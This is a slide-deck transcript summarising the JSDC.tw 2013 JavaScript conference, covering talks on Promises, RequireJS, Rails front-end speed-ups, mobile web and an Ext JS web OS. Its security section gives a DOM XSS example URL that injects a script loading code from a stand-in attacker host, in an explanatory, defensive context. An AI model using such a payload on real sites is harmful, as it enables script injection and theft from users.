JSDC Summary

Download Report

Transcript JSDC Summary 

JSDC.tw 2013 Summary
GAIS LAB group Meeting
05/29
alan7
JSDC
+
• JavaScript.tw
• HTML5&CSS5
• Node.js
所有懶人包: http://goo.gl/bvvFb
Conference in 2013 http://goo.gl/UJmZ0
名稱
內容
日期
價格
WebConf
網頁開發者研討會
01/12 ~ 13
1300/780
ConCom
研討會的組織工作者的會
議 (餐會)
02/23
-
SITCON
由學生自發舉辦之聚會
03/16
免費
OSDC
開放源碼開發者研討會
04/19 ~ 20
500
ICOS
開放源碼國際研討會
04/26 ~ 28
免費
JSDC
JavaScript 技術研討會
05/18 ~ 19
1800/1000
PyCon
Python 社群年會
05/25 ~ 26
4500/2500/1500
DrupalCamp
致力推廣 Drupal
07/06 ~ 07(暫定)
900/600
HITCON
駭客年會
07/19~20
3000/1500
JavaTwo (oracle)
Java Developer Day
08/02
1400/1200
COSCUP
開源人年會
08/03~04
免費
PHPConf
PHP年會
10/05
未定
MOPCON
行動應用技術研討會
10/26-27
未定
About conference
• General Topic
– usually from most important provider
– For all
• Specify Topic
– Run on the same time
– Select the Issue which you’d like
All Topic (day 1)
•
•
•
1.KeyNote :The evolution of JavaScript & Public Cloud - Joe Ziegler / Amazon Web Services
2-1.The seven year itch with ExtJS - Calvin Yeh / Pastico
2-2.从前端到终端 — 跨越平台的前端技术 -王文明 / 奇虎360
• 2-3.Easier async -flow control 的原理、應用、
實作及展望 -馮旭平 / 吉立富資訊
•
•
•
•
•
•
•
•
•
3-1.Node.js 佈署常見問題 - Steven XP / Fandora
3-2.JavaScript 開發實戰:效能調校與常見陷阱 - Will 保哥 / 多奇數位創意
3-3.RequireJs - Using AMD to fight the good,the bad and the ugly of JavaScript. - David Shariff /
Richi
4-1.我編譯故我在:誰說 Node.js 程式不能編成 Binary - Fred Chien / Mandice
4-2.愛料理網站前端開發經驗談 - Lawrence Lin / Polydice
4-3.為什麼你還是應該使用 Rails 開發:前端加速以及前端開發管理 - xdite / RocoDev
5-1.如何教設計師前端技術 - EvenWu / evendesign
5-2.前端工程師的資安挑戰 – Ant
5-3. OMG!Mobile Web can do that? - Sean / youmeb
Easier async -flow control
• Javascript怎麼執行非同步程式?
• Callback,或是稱作Continuation-passing
Style (CPS)
– 從函數的參數,接收一個外部的函數或物件
– 在函數執行完畢時,不返回執行結果,而呼叫
外部函數或物件的方法,把執行結果傳遞給它
(continuation passing)
Easier async -flow control
• Why Using flow control
– 需要CPS又需要循序執行
– Ex. 跟server要數字A去跟B計算再跟server要C去
算出結果
– 嵌套
• 不易閱讀、維護、編輯
Easier async -flow control
• How?
–
–
–
–
內部無法判定 交由函數外部
http://jsfiddle.net/bwT6r/
循序執行範例 http://jsfiddle.net/X7EL9/
把結果往後傳之範例 http://jsfiddle.net/SqAsZ/
• 其實也有很多lib可供直接使用
– 推薦的: https://github.com/caolan/async/
• 很多流程控制函數parallel、serial、waterfall
• 提供一些非同步工具
– 沒有標準做法,所以市面上有幾十種類似的工具,
各有優缺點
Easier async -flow control
• 另外一個方法:Promise
– 相關:Future、Deferred、Promise,都是類似的概念
– 不需要使用CPS,改用Promise物件來維護、傳遞執行狀
態
• Promise物件只有三種狀態:
– 初始的unfulfill狀態
– 代表執行成功的fulfill狀態(resolved)
– 代表執行失敗的fail狀態(rejected)
• Promise物件有一個then方法:
– p.then(success_func, fail_func)
• then方法的執行結果也是一個Promise,所以可以串
接下去
Easier async -flow control
• Promise的一些優點
– 使用起來很簡單明瞭,基本上只需要知道:
• 狀態只會從unfulfill轉變成fulfill或是fail,一旦變成fulfill或
是fail,就不會變動
• 基本上Promise/A只定義一個操作介面,就是then
– then中指定的函數不需要額外的Callback,只需要
返回執行結果。再加個then就可以繼續串接執行下
去,這樣比CPS還要直覺
– 它會考慮到error handling,所有發生的exception都
會被處理
– Promise開始形成標準,未來甚至可能成為
Javascript內建的物件
Easier async -flow control
• Promise的一些缺點
• 目前已經有一些Promise/A+標準的實作,包
括jQuery1.5+、WinJS for win8 app、Q等,
但是各家實作差異其實也還不小
• WinJS.Promise 物件與 jQuery Deferred 物件
比較 by vexed
– http://ithelp.ithome.com.tw/question/10118894
Easier async -flow control
• JQuery Deferred 範例
Easier async -flow control
• Promise 注意事項
– 如果自己控制Promise,尤其是一群Promise陣
列,一定要讓所有的Promise物件狀態走到fulfill
或是fail,否則程式就停住不前進了
– 可以在then中的函數裡面使用Promise來控制流
程,不過有些流程是可以抽到外面來的,並不
需要放在內層
All Topic (day 1)
•
•
•
•
•
•
1.KeyNote :The evolution of JavaScript & Public Cloud - Joe Ziegler / Amazon Web Services
2-1.The seven year itch with ExtJS - Calvin Yeh / Pastico
2-2.从前端到终端 — 跨越平台的前端技术 -王文明 / 奇虎360
2-3.Easier async -flow control 的原理、應用、實作及展望 -馮旭平 / 吉立富資訊
3-1.Node.js 佈署常見問題 - Steven XP / Fandora
3-2.JavaScript 開發實戰:效能調校與常見陷阱 - Will 保哥 / 多奇數位創意
• 3-3.RequireJs - Using AMD to fight the good,the bad
and the ugly of JavaScript. - David Shariff / Richi
•
•
•
•
•
•
4-1.我編譯故我在:誰說 Node.js 程式不能編成 Binary - Fred Chien / Mandice
4-2.愛料理網站前端開發經驗談 - Lawrence Lin / Polydice
4-3.為什麼你還是應該使用 Rails 開發:前端加速以及前端開發管理 - xdite / RocoDev
5-1.如何教設計師前端技術 - EvenWu / evendesign
5-2.前端工程師的資安挑戰 – Ant
5-3. OMG!Mobile Web can do that? - Sean / youmeb
RequireJs - Using AMD
• Asynchronous Module Definition
– Modules are encapsulated and sandboxed.
– Create and reuse code from different products.
– No cross domain loading issues, can load modules
without a build process or server-side tool.
– Structured, clean codebase.
– Async loading, managed dependencies.
– Lazy load modules (stuff not used by the user yet can
be loaded in background when needed on demand).
– Not a technology, but a specification proposal.
RequireJs - Using AMD
• Module vs. Frameworks
– Frameworks suck?
• You don't tell the framework what to do, it tells you.
• Huge, complicated structure that is not relevant to your
application.
– Modules Rock?
•
•
•
•
Single purpose responsibility.
Sandboxed.
Reusable, maintainable, scaleable, distributable.
Abstract interface with well defined import & export.
RequireJs - Using AMD
• AMD IMPLEMENTATION
RequireJs - Using AMD
• Two important concepts
– DEFINE() VS REQUIRE()
• Lazy evaluation of code contained inside module, only
executed when it's needed.
• Once executed, subsequent calls are cached, no need
to fetch the module again.
• One module per file.
• When you only need to use modules, not create them.
• Dependencies that can not be evaluated until runtime
or only loaded when a specific event occurs.
RequireJs - Using AMD
• Can inheritance
RequireJs - Using AMD
• Setting
–
–
–
–
–
–
baseURL
waitSeconds
urlArgs
Config
PATH
MAP
• Can be a project
– Packages
– Multiversion
All Topic (day 1)
•
•
•
•
•
•
•
•
•
1.KeyNote :The evolution of JavaScript & Public Cloud - Joe Ziegler / Amazon Web Services
2-1.The seven year itch with ExtJS - Calvin Yeh / Pastico
2-2.从前端到终端 — 跨越平台的前端技术 -王文明 / 奇虎360
2-3.Easier async -flow control 的原理、應用、實作及展望 -馮旭平 / 吉立富資訊
3-1.Node.js 佈署常見問題 - Steven XP / Fandora
3-2.JavaScript 開發實戰:效能調校與常見陷阱 - Will 保哥 / 多奇數位創意
3-3.RequireJs - Using AMD to fight the good,the bad and the ugly of JavaScript. - David Shariff /
Richi
4-1.我編譯故我在:誰說 Node.js 程式不能編成 Binary - Fred Chien / Mandice
4-2.愛料理網站前端開發經驗談 - Lawrence Lin / Polydice
• 4-3.為什麼你還是應該使用 Rails 開發:前端加速
以及前端開發管理 - xdite / RocoDev
•
•
•
5-1.如何教設計師前端技術 - EvenWu / evendesign
5-2.前端工程師的資安挑戰 – Ant
5-3. OMG!Mobile Web can do that? - Sean / youmeb
為什麼你還是應該使用 Rails 開發:
前端加速以及前端開發管理
• 「網頁產生速度」
為什麼你還是應該使用 Rails 開發:
前端加速以及前端開發管理
• Scaling Websites
– Front-end speed
(7s -> 1s)
– SQL Query speed (500ms -> 50ms)
– Method speed
(50ms -> 10ms)
– Programing Language speed
(5ms -> 2ms)
• Webpage 產生速度 =
SQL Query speed +
Method speed +
Programing Language speed
為什麼你還是應該使用 Rails 開發:
前端加速以及前端開發管理
為什麼你還是應該使用 Rails 開發:前端
加速以及前端開發管理
• Easy to apply Parallel Download
– The HTTP/1.1 specification suggests that browsers
download no more than 2 components in parallel
per hostname.
– If you serve your images from multiple hostnames,
you can get more than two downloads to occur in
parallel.
4 支 CSS 開 8 秒 => 4 支開 2 秒
為什麼你還是應該使用 Rails 開發:
前端加速以及前端開發管理
• As same to implement CDN (Content
Distribution Network)
– Invalid Problem?
timestamp
為什麼你還是應該使用 Rails 開發:
前端加速以及前端開發管理
• minimal HTTP Request
為什麼你還是應該使用 Rails 開發:
前端加速以及前端開發管理
• CSS Sprite
– Powered by SCSS & Compass
為什麼你還是應該使用 Rails 開發:
前端加速以及前端開發管理
• ETag
– provides for web cache validation
– allows a client to make conditional requests
– saves bandwidth
All Topic (day 1)
•
•
•
•
•
•
•
•
•
•
•
1.KeyNote :The evolution of JavaScript & Public Cloud - Joe Ziegler / Amazon Web
Services
2-1.The seven year itch with ExtJS - Calvin Yeh / Pastico
2-2.从前端到终端 — 跨越平台的前端技术 -王文明 / 奇虎360
2-3.Easier async -flow control 的原理、應用、實作及展望 -馮旭平 / 吉立富資訊
3-1.Node.js 佈署常見問題 - Steven XP / Fandora
3-2.JavaScript 開發實戰:效能調校與常見陷阱 - Will 保哥 / 多奇數位創意
3-3.RequireJs - Using AMD to fight the good,the bad and the ugly of JavaScript. David Shariff / Richi
4-1.我編譯故我在:誰說 Node.js 程式不能編成 Binary - Fred Chien / Mandice
4-2.愛料理網站前端開發經驗談 - Lawrence Lin / Polydice
4-3.為什麼你還是應該使用 Rails 開發:前端加速以及前端開發管理 - xdite
/ RocoDev
5-1.如何教設計師前端技術 - EvenWu / evendesign
• 5-2.前端工程師的資安挑戰 – Ant
•
5-3. OMG!Mobile Web can do that? - Sean / youmeb
前端工程師的資安挑戰
• OWASP Top Ten 「網站應用程式十大弱點」
– 網頁安全
– 每三年改版一次
•
•
•
•
•
•
•
•
•
•
Injection (2nd SQL Injection)
Broken Authentication Session Management
Cross-Site Scripting (XSS)
Insecure Direct Object Reference
Security Misconfiguration
Sensitive Data Exposure
Missing Function Level Access Control
Cross-site Request Forgery (CSRF)
Using Known Vulnerable Components
Unvalidated Redirects and Forwards
前端工程師的資安挑戰
• DOM XSS
– 問題直接在client發生,利用類似如下
http://evil.com/#name
#name並不會被送到server端而是直接在local
執行所以會有下面這種狀況
http://evil.com/#name<script src=http://evil.com/a.js></script>
– 更進階的應用,直接弄成短網址根本看不出來
前端工程師的資安挑戰
• CSRF
– A. 不要用HTTP GET而是HTTP POST
– B. Referer 檢查 (還是有辦法偽造)
– C. Double Cookies
– D. Form token/random token (很足夠去抵擋攻擊,
但還是有機會被破 )
– ClickJacking
前端工程師的資安挑戰
• 引用他站的js? (like CDN)
<script src=“http://cdn.com/t.js”></script>
• CDN爆了… 你也爆了
• 暗黑執行緒的大大說 若google被打下來 也
就認了
前端工程師的資安挑戰
• 我不是大大之ㄧ些開發準則分享
– Filter input
– Escape output
– One time token
– 不要相信任何客戶端的驗證
• Ex.前端網頁的maxlength、filter/vaildation、SQL
All Topic (day 1)
•
•
6-1.中文網路字型 justfont 實作過程 - Michael / justfont
6-2.做更快一點 工程師討生活工具介紹 - UP Chen / Nvesto
• 6-3.關於 Mobile Web 開發二三事 - Eric
Chuang / Yahoo
•
•
•
•
•
•
•
•
7-1.支援遊戲及互動應用的雲 -胡舜元 / 中央研究院資訊所多媒體網路與系統實驗室
7-2. Building a Web OS based on Ext JS - Rex Huang / Synology
7-3. Begin Three.js -廖一帆 / The ManX
8-1.樸實與浮華 (Plain and Vanity) / (Usability & Performance) - Paul Li/ Yahoo
8-2.用 Node.JS 開發 KKBOX 一起聽 - Butany Chuang / KKBOX
9-1. Optimizing Your Mobile Web Apps - Kuro Hsu
9-2. Defensive backend programming with node.js - Ruben Tan / OnApp CDN Sdn Bhd
10. Lightning talks
– Zhusee – Bumbler to speech 以 JS 實作簡易 audio sprites
– 小B – 從 Rails 到 Node + Backbone TouchLimit 的累死人砍掉重練
– Irvin – 噗浪最近有點胖
– YuTin – 從專案開發談終身大事
– Fred – Stem OS – JavaScript OS
關於 Mobile Web 開發二三事
• Mobile Web vs. Mobile App
關於 Mobile Web 開發二三事
• 挑戰的複雜度:
– 手機 x 瀏覽器 x OS版本 ….
• 降低Page Load的時間
– 減少HTTP request的數量
– 減少頁面大小
– 縮圖在伺服器上做
– 後端要夠力
– 後面就是lib的介紹
All Topic (day 1)
•
•
•
•
6-1.中文網路字型 justfont 實作過程 - Michael / justfont
6-2.做更快一點 工程師討生活工具介紹 - UP Chen / Nvesto
6-3.關於 Mobile Web 開發二三事 - Eric Chuang / Yahoo
7-1.支援遊戲及互動應用的雲 -胡舜元 / 中央研究院資訊所多媒體網路與系統實驗室
• 7-2. Building a Web OS based on Ext JS - Rex
Huang / Synology
•
•
•
•
•
•
7-3. Begin Three.js -廖一帆 / The ManX
8-1.樸實與浮華 (Plain and Vanity) / (Usability & Performance) - Paul Li/ Yahoo
8-2.用 Node.JS 開發 KKBOX 一起聽 - Butany Chuang / KKBOX
9-1. Optimizing Your Mobile Web Apps - Kuro Hsu
9-2. Defensive backend programming with node.js - Ruben Tan / OnApp CDN Sdn Bhd
10. Lightning talks
– Zhusee – Bumbler to speech 以 JS 實作簡易 audio sprites
– 小B – 從 Rails 到 Node + Backbone TouchLimit 的累死人砍掉重練
– Irvin – 噗浪最近有點胖
– YuTin – 從專案開發談終身大事
– Fred – Stem OS – JavaScript OS
Building a Web OS based on Ext JS
• Better User experience
– Framework
– JavaScript Loading
– Object-Oriented Design
– Window Management
Building a Web OS based on Ext JS
Building a Web OS based on Ext JS
• Ext JS
– JavaScript framework for rich desktop apps
– Cross-browser compatibility
– Rich modern UI widgets
Building a Web OS based on Ext JS
Inline scripts(<script src=“synology.js”>)
blocks HTML rendering
blocks parallel downloading(images/iframes)
Building a Web OS based on Ext JS
• Async Loading
– Add defer attribute
<script src=“synology.js” defer ></script>
– Add async attribute
<script src=“synology.js” async ></script>
Building a Web OS based on Ext JS
• Object-Oriented Design
– Ext JS Class System
– For example
Building a Web OS based on Ext JS
• DOM cloneNode
var node = document.getElementById ("node");
var clonedNode = node.cloneNode (true);
// clear the id property of the cloned table
clonedNode.id = "";
var previewBox =
document.getElementById("previewBox");
previewBox.appendChild (clonedNode)
Building a Web OS based on Ext JS
•
•
•
•
•
CSS Transform: scale
transform: scale(x,y);
ms-transform: scale(x,y);
webkit-transform: scale(x,y);
moz-transform: scale(x,y);
Building a Web OS based on Ext JS
• Window Management
?
Building a Web OS based on Ext JS
• The manager manages communication
between modules
Building a Web OS based on Ext JS
All Topic (day 1)
•
•
•
•
•
•
•
•
•
•
6-1.中文網路字型 justfont 實作過程 - Michael / justfont
6-2.做更快一點 工程師討生活工具介紹 - UP Chen / Nvesto
6-3.關於 Mobile Web 開發二三事 - Eric Chuang / Yahoo
7-1.支援遊戲及互動應用的雲 -胡舜元 / 中央研究院資訊所多媒體網路與系統實驗室
7-2. Building a Web OS based on Ext JS - Rex Huang / Synology
7-3. Begin Three.js -廖一帆 / The ManX
8-1.樸實與浮華 (Plain and Vanity) / (Usability & Performance) - Paul Li/ Yahoo
8-2.用 Node.JS 開發 KKBOX 一起聽 - Butany Chuang / KKBOX
9-1. Optimizing Your Mobile Web Apps - Kuro Hsu
9-2. Defensive backend programming with node.js - Ruben Tan / OnApp CDN Sdn Bhd
• 10. Lightning talks
–
–
–
–
–
–
Zhusee – Bumbler to speech 以 JS 實作簡易 audio sprites
小B – 從 Rails 到 Node + Backbone TouchLimit 的累死人砍掉重練
Irvin – 噗浪最近有點胖
YuTin – 從專案開發談終身大事
Fred – Stem OS – JavaScript OS
Blue – g0v & listening me
All Topic (day 2)
• 1.KeyNote : F2E – The Keystone of the
Industry - josephj (蔣定宇) / miiiCasa
•
•
•
•
•
•
•
•
•
•
2-1.Real-time web application with Socket.IO, Node.js and Redis. - York Tsai
/ EZTable
2-2. High-performance games and more in JavaScript with asm.js - Vladimir
Vukicevic (Inventor of WebGL) /Mozilla Taiwan 美商謀智
2-3. Rock with Knockout.js -流浪小風 / 91mai 就要買
3-1. Web Worker 行不行 - Bingo Yang (楊秉桓) / hTC
3-2.透視 JavaScript 的 MVC / MVP / MVVM -大澤木小鐵 / 台灣新浪
3-3.你不可不知的前端開發工具 - Appleboy / 瑞昱半導體
4-1.生在幸福的 JS 年代 (早期 JS 演進過程開發心得) - Hina Blue(閃光洽)
4-2. Mobile Web Game 經驗開發談 -陳世欽
4-3. Magic “this“ - othree / hTC
5-1. Titanium 入門實戰 30 分鐘教你寫出 youtube App + 會員系統 - Kevin Huang
/ VideOhya
F2E – The Keystone of the Industry
• F2E (Front End Engineer)
• 一般認知:
– JavaScript =玩具語言 、跟後端相比簡單多了
– 入門容易 、better to have
– 薪水比較便宜
• 為什麼不可缺少:
– 工程師不愛切版(重邏輯、資料 不管呈現)
– 設計師不愛切版(重呈現、不管作法)
F2E – The Keystone of the Industry
• 需打好基礎:
– 每個HTML TAG的意義
– 前端!= jQuery
– JavaScript 跟DOM API的關連與區別
– Event事件模型
– AJAX、JSONP是甚麼
F2E – The Keystone of the Industry
• 避免盲目追求新技術
– 好的前端!=知道很多技術
– 能夠深入研究並且整合
– 制定規範
– 提升整體品質
– 幫大家解決問題
– 才能稱得上好的前端工程師
F2E – The Keystone of the Industry
• 積極分享、多回饋
– GitHub
• Http://f2eclass.com
All Topic (day 2)
• 6-1. Your Phone is the Controller - Aidan Wu
/ SympaSoft
•
•
•
•
•
•
•
•
•
6-2. Porting to Web: An Introduction to Emscripten - Ting-Yuan Huang / Mozilla Taiwan 美商謀智
6-3.如何打造雲端開發平台 - Marty (許益祥) / 中冠資訊
7-1. Ragic Interface 設計經驗分享 -長頸鹿(liberation) / Ragic 立即科技
7-2.設計師!你 RWD 了沒? - Nowill / Nowill Design
8-1. CreateJS:「從 Flash 到 JavaScript」 - 高見龍 / 高思數位網路
8-2. Elastic Beanstalk: deploy your applications fast, effectively and elastically - Joe Ziegler / Amazon
Web Services
9-1. XULRunner + JS 開發應用 - 阿土伯 / VIVIPOS
9-2. Code for Quality – 提昇 JavaScript 撰寫品質。 - josephj / miiiCasa
10-1. Lightning talks
– Gias Kay Less – Functional Programming in 5 minutes
– Grassboy – 結合"無障礙"網頁設計規範的人類精神官能委靡驗證碼
– tonypai – 進擊的鄉民
– Crboy – 用 JS patch 你的網站
– 阿修 – TiSippet
Your Phone is the Controller
Your Phone is the Controller
Your Phone is the Controller
• Why is HTML5 gaming so cool?
– Install? Write once play anywhere
– Graphics? Canvas & WebGL
– Sounds? HTML5 audio
– Communication? Multiplayer game server
– Data? Web Storage / Offline
– Controls? Keyboard and touch
Your Phone is the Controller
• That’s strat with develop game
Your Phone is the Controller
Conclusion
• 多參與社群
• 多了解新知
• 分享與回饋
Any Question?